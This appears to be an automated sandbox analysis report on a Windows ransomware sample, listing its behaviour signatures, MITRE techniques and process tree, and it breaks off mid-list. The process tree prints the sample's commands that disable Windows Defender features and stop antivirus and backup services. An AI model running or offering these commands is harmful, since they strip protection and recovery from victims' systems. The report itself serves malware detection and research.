2481bcb7380b038e84a6052a3cc42fab8e791cf1dffaefe783398a843af68c22

Analysis

max time kernel
14s
max time network
153s
platform
windows10_x64
resource
win10v20210410
submitted
28-05-2021 09:57

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe
Size

165KB
MD5

1407b521eded12eca22dc4a12421be59
SHA1

031cf6f7f62cbea5753b3d6cc7ee113f69aa43a3
SHA256

79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249
SHA512

79ed739a0ad7f9b45150f491dc9e1cd9f8d4b828fc0ff82bdc23307c4e31efefb862d163ded840438759805b3a792b3fa569d3cce13e4702987a107bc85d3406

Score

10^/10

discovery evasion ransomware trojan

Malware Config

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490
Downloads MZ/PE file
Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031

Modifies file permissions 1 TTPs 13 IoCs

discovery

File and Directory Permissions Modification

T1222

Processes:

icacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exe

pid	process
5656	icacls.exe
4428	icacls.exe
5536	icacls.exe
5476	icacls.exe
5236	icacls.exe
4700	icacls.exe
4580	icacls.exe
1472	icacls.exe
5832	icacls.exe
5044	icacls.exe
5960	icacls.exe
4068	icacls.exe
5492	icacls.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Interacts with shadow copies 2 TTPs 14 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1107

Inhibit System Recovery

T1490

Processes:

vssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exe

pid	process
5668	vssadmin.exe
5560	vssadmin.exe
5648	vssadmin.exe
5308	vssadmin.exe
4832	vssadmin.exe
5968	vssadmin.exe
4268	vssadmin.exe
5264	vssadmin.exe
4476	vssadmin.exe
4484	vssadmin.exe
5568	vssadmin.exe
5788	vssadmin.exe
5696	vssadmin.exe
4968	vssadmin.exe

Kills process with taskkill 64 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	process
4444	taskkill.exe
5092	taskkill.exe
5960	taskkill.exe
4140	taskkill.exe
4936	taskkill.exe
4720	taskkill.exe
5316	taskkill.exe
4492	taskkill.exe
5564	taskkill.exe
4664	taskkill.exe
4684	taskkill.exe
4224	taskkill.exe
1008	taskkill.exe
5788	taskkill.exe
5444	taskkill.exe
5184	taskkill.exe
4972	taskkill.exe
1380	taskkill.exe
1572	taskkill.exe
5004	taskkill.exe
2568	taskkill.exe
4884	taskkill.exe
4136	taskkill.exe
5812	taskkill.exe
1092	taskkill.exe
2508	taskkill.exe
5248	taskkill.exe
5808	taskkill.exe
4736	taskkill.exe
5164	taskkill.exe
3464	taskkill.exe
5148	taskkill.exe
5028	taskkill.exe
4144	taskkill.exe
2084	taskkill.exe
5896	taskkill.exe
4572	taskkill.exe
4356	taskkill.exe
2456	taskkill.exe
5720	taskkill.exe
5592	taskkill.exe
4176	taskkill.exe
5476	taskkill.exe
6072	taskkill.exe
2024	taskkill.exe
4572	taskkill.exe
5584	taskkill.exe
4524	taskkill.exe
4824	taskkill.exe
4212	taskkill.exe
4392	taskkill.exe
2888	taskkill.exe
4452	taskkill.exe
5176	taskkill.exe
4416	taskkill.exe
4992	taskkill.exe
5400	taskkill.exe
6008	taskkill.exe
5580	taskkill.exe
6124	taskkill.exe
4876	taskkill.exe
2636	taskkill.exe
5784	taskkill.exe
4808	taskkill.exe

Modifies registry key 1 TTPs 2 IoCs

Modify Registry
T1112

Processes:

reg.exereg.exe

pid process

2184 reg.exe
3108 reg.exe
Runs net.exe
Runs ping.exe 1 TTPs 4 IoCs

Remote System Discovery
T1018

Processes:

PING.EXEPING.EXEPING.EXEPING.EXE

pid process

6060 PING.EXE
4180 PING.EXE
1376 PING.EXE
5628 PING.EXE

pid	process
2184	reg.exe
3108	reg.exe

pid	process
6060	PING.EXE
4180	PING.EXE
1376	PING.EXE
5628	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exepowershell.exe

pid	process
3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe
3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe
3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe
3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe
3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe
3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe
3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe
3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe
3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe
3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe
3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe
3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe
3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe
3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe
3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe
3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe
3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe
3292	powershell.exe
3292	powershell.exe
3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe
3292	powershell.exe
3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe
3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe
3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe
3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe
3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe
3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe
3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe
3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe
3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe
3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe
3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe
3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe
3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe
3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe
3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe
3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe
3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe
3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe
3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe
3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe
3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe
3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe
3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe
3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe
3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe
3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe
3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe
3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe
3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe
3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe
3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe
3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe
3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe
3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe
3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe
3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe
3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe
3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe
3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe
3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe
3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe
3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe
3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe

Suspicious use of AdjustPrivilegeToken 35 IoCs

Processes:

79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exearp.exepowershell.exePING.EXEtaskkill.exetaskkill.exe

description	pid	process
Token: SeDebugPrivilege	3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe
Token: SeDebugPrivilege	3292	powershell.exe
Token: SeIncreaseQuotaPrivilege	3292	powershell.exe
Token: SeSecurityPrivilege	3292	powershell.exe
Token: SeTakeOwnershipPrivilege	3292	powershell.exe
Token: SeLoadDriverPrivilege	3292	powershell.exe
Token: SeSystemProfilePrivilege	3292	powershell.exe
Token: SeSystemtimePrivilege	3292	powershell.exe
Token: SeProfSingleProcessPrivilege	3292	powershell.exe
Token: SeIncBasePriorityPrivilege	3292	powershell.exe
Token: SeCreatePagefilePrivilege	3292	powershell.exe
Token: SeBackupPrivilege	3292	powershell.exe
Token: SeRestorePrivilege	3292	powershell.exe
Token: SeShutdownPrivilege	3292	powershell.exe
Token: SeDebugPrivilege	3292	powershell.exe
Token: SeSystemEnvironmentPrivilege	3292	powershell.exe
Token: SeRemoteShutdownPrivilege	3292	powershell.exe
Token: SeUndockPrivilege	3292	powershell.exe
Token: SeManageVolumePrivilege	3292	powershell.exe
Token: 33	3292	powershell.exe
Token: 34	3292	powershell.exe
Token: 35	3292	powershell.exe
Token: 36	3292	powershell.exe
Token: SeDebugPrivilege	636	powershell.exe
Token: SeDebugPrivilege	3244	powershell.exe
Token: SeDebugPrivilege	2172	powershell.exe
Token: SeDebugPrivilege	2868	powershell.exe
Token: SeDebugPrivilege	64	powershell.exe
Token: SeDebugPrivilege	376	arp.exe
Token: SeDebugPrivilege	3960	powershell.exe
Token: SeDebugPrivilege	4180	PING.EXE
Token: SeDebugPrivilege	4296
Token: SeDebugPrivilege	4440
Token: SeDebugPrivilege	4684	taskkill.exe
Token: SeDebugPrivilege	4552	taskkill.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exenet1.exeConhost.exeConhost.exenet.exe

description	pid	process	target process
PID 3560 wrote to memory of 3292	3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe	powershell.exe
PID 3560 wrote to memory of 3292	3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe	powershell.exe
PID 3560 wrote to memory of 636	3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe	powershell.exe
PID 3560 wrote to memory of 636	3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe	powershell.exe
PID 3560 wrote to memory of 3244	3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe	powershell.exe
PID 3560 wrote to memory of 3244	3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe	powershell.exe
PID 3560 wrote to memory of 2172	3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe	powershell.exe
PID 3560 wrote to memory of 2172	3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe	powershell.exe
PID 3560 wrote to memory of 2868	3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe	powershell.exe
PID 3560 wrote to memory of 2868	3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe	powershell.exe
PID 3560 wrote to memory of 3960	3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe	powershell.exe
PID 3560 wrote to memory of 3960	3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe	powershell.exe
PID 3560 wrote to memory of 64	3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe	powershell.exe
PID 3560 wrote to memory of 64	3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe	powershell.exe
PID 3560 wrote to memory of 376	3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe	powershell.exe
PID 3560 wrote to memory of 376	3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe	powershell.exe
PID 3560 wrote to memory of 4180	3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe	powershell.exe
PID 3560 wrote to memory of 4180	3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe	powershell.exe
PID 3560 wrote to memory of 4296	3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe	powershell.exe
PID 3560 wrote to memory of 4296	3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe	powershell.exe
PID 3560 wrote to memory of 4440	3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe	powershell.exe
PID 3560 wrote to memory of 4440	3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe	powershell.exe
PID 3560 wrote to memory of 4552	3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe	taskkill.exe
PID 3560 wrote to memory of 4552	3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe	taskkill.exe
PID 3560 wrote to memory of 4684	3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe	taskkill.exe
PID 3560 wrote to memory of 4684	3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe	taskkill.exe
PID 3560 wrote to memory of 4752	3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe	Conhost.exe
PID 3560 wrote to memory of 4752	3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe	Conhost.exe
PID 3560 wrote to memory of 4772	3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe	net1.exe
PID 3560 wrote to memory of 4772	3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe	net1.exe
PID 3560 wrote to memory of 4804	3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe	Conhost.exe
PID 3560 wrote to memory of 4804	3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe	Conhost.exe
PID 3560 wrote to memory of 4864	3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe	net.exe
PID 3560 wrote to memory of 4864	3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe	net.exe
PID 3560 wrote to memory of 4928	3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe	net.exe
PID 3560 wrote to memory of 4928	3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe	net.exe
PID 3560 wrote to memory of 4980	3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe	Conhost.exe
PID 3560 wrote to memory of 4980	3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe	Conhost.exe
PID 3560 wrote to memory of 5052	3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe	net.exe
PID 3560 wrote to memory of 5052	3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe	net.exe
PID 3560 wrote to memory of 996	3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe	Conhost.exe
PID 3560 wrote to memory of 996	3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe	Conhost.exe
PID 3560 wrote to memory of 1456	3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe	net.exe
PID 3560 wrote to memory of 1456	3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe	net.exe
PID 3560 wrote to memory of 4220	3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe	net.exe
PID 3560 wrote to memory of 4220	3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe	net.exe
PID 3560 wrote to memory of 4448	3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe	net.exe
PID 3560 wrote to memory of 4448	3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe	net.exe
PID 3560 wrote to memory of 4692	3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe	net.exe
PID 3560 wrote to memory of 4692	3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe	net.exe
PID 3560 wrote to memory of 4600	3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe	net.exe
PID 3560 wrote to memory of 4600	3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe	net.exe
PID 4772 wrote to memory of 1460	4772	net1.exe	net1.exe
PID 4772 wrote to memory of 1460	4772	net1.exe	net1.exe
PID 4752 wrote to memory of 2768	4752	Conhost.exe	Conhost.exe
PID 4752 wrote to memory of 2768	4752	Conhost.exe	Conhost.exe
PID 4804 wrote to memory of 4000	4804	Conhost.exe	Conhost.exe
PID 4804 wrote to memory of 4000	4804	Conhost.exe	Conhost.exe
PID 3560 wrote to memory of 4004	3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe	Conhost.exe
PID 3560 wrote to memory of 4004	3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe	Conhost.exe
PID 3560 wrote to memory of 5124	3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe	net.exe
PID 3560 wrote to memory of 5124	3560	79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe	net.exe
PID 4864 wrote to memory of 5160	4864	net.exe	net1.exe
PID 4864 wrote to memory of 5160	4864	net.exe	net1.exe

C:\Users\Admin\AppData\Local\Temp\79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe
"C:\Users\Admin\AppData\Local\Temp\79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3560
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" Get-MpPreference -verbose
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3292
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:636
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3244
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2172
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2868
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3960
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:64
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 6
  2⤵
  PID:376
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 0
  2⤵
  PID:4180
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 6
  2⤵
  PID:4296
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 6
  2⤵
  PID:4440
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true
  2⤵
  PID:4552
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 2
  2⤵
  PID:4684
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop avpsus /y
  2⤵
  PID:4752
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop avpsus /y
    3⤵
    PID:2768
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop McAfeeDLPAgentService /y
  2⤵
  PID:4772
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop mfewc /y
  2⤵
  PID:4804
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop mfewc /y
    3⤵
    PID:4000
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BMR Boot Service /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4864
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BMR Boot Service /y
    3⤵
    PID:5160
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop NetBackup BMR MTFTP Service /y
  2⤵
  PID:4928
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y
    3⤵
    PID:5172
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop ccEvtMgr /y
  2⤵
  PID:5052
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ccEvtMgr /y
    3⤵
    PID:5432
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop ccSetMgr /y
  2⤵
  PID:996
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ccSetMgr /y
    3⤵
    PID:5628
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop BackupExecManagementService /y
      4⤵
      PID:5196
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SavRoam /y
  2⤵
  PID:1456
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SavRoam /y
    3⤵
    PID:5444
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop QBIDPService /y
  2⤵
  PID:4692
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop QBIDPService /y
    3⤵
    PID:5684
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop QBCFMonitorService /y
  2⤵
  PID:4004
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop QBCFMonitorService /y
    3⤵
    PID:5776
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop stc_raw_agent /y
  2⤵
  PID:5328
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop stc_raw_agent /y
    3⤵
    PID:5480
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop VSNAPVSS /y
  2⤵
  PID:5408
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VSNAPVSS /y
    3⤵
    PID:5188
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop VeeamTransportSvc /y
  2⤵
  PID:5504
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamTransportSvc /y
    3⤵
    PID:5288
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecVSSProvider /y
  2⤵
  PID:5824
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecVSSProvider /y
    3⤵
    PID:5972
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:5172
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecAgentBrowser /y
  2⤵
  PID:6012
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecAgentBrowser /y
    3⤵
    PID:5984
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecDiveciMediaService /y
  2⤵
  PID:6072
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecDiveciMediaService /y
    3⤵
    PID:5160
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecAgentAccelerator /y
  2⤵
  PID:5916
- C:\Windows\SYSTEM32\net.exe
